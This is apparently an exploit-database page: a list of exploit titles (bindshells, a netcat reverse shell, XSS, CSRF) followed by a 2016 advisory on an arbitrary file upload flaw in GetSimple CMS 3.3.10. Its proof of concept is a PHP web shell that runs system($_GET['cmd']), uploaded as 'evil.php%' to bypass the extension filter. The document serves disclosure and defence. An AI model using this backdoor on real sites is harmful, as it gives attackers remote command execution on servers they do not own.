3739831fb2
16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities
45 lines
No EOL
1.5 KiB
Text
Executable file
45 lines
No EOL
1.5 KiB
Text
Executable file
# Exploit Title: Getsimple CMS <= 3.3.10 Arbitrary File Upload Vulnerability
|
|
# Google Dork: -
|
|
# Date: 23/06/2016
|
|
# Exploit Author: s0nk3y
|
|
# Vendor Homepage: http://get-simple.info/
|
|
# Category: webapps
|
|
# Software Link: http://get-simple.info/data/uploads/releases/GetSimpleCMS-3.3.10.zip
|
|
# Version: 3.3.10
|
|
# Tested on: Ubuntu 16.04 / Mozilla Firefox
|
|
# Twitter: http://twitter.com/s0nk3y
|
|
# Linkedin: Rahmat Nurfauzi - http://linkedin.com/in/rahmatnurfauzi
|
|
|
|
Description
|
|
========================
|
|
|
|
GetSimple CMS has been downloaded over 120,000 times (as of March 2013).
|
|
The magazine t3n assigns GetSimple as "micro" and "Minimal-CMS" one, praises
|
|
the simplicity yet possible extensibility through plug-ins.
|
|
|
|
Vulnerability
|
|
========================
|
|
|
|
GetSimpleCMS Version 3.3.10 suffers from arbitrary file upload vulnerability
|
|
which allows an attacker to upload a backdoor.
|
|
|
|
This vulnerability is that the application uses a blacklist and whitelist
|
|
technique to compare the file against mime types and extensions.
|
|
|
|
Proof of Concept
|
|
========================
|
|
|
|
For exploiting this vulnerability we will create a file by adding the percent
|
|
behind extension.
|
|
1. evil.php% <--- this is simple trick :)
|
|
<?php
|
|
// simple backdoor
|
|
system($_GET['cmd']);
|
|
?>
|
|
2. An attacker login to the admin page and uploading the backdoor
|
|
3. The uploaded file will be under the "/data/uploads/" folder
|
|
|
|
Report Timeline
|
|
========================
|
|
2016-06-23 : Vulnerability reported to vendor
|
|
2016-06-23 : Disclosure |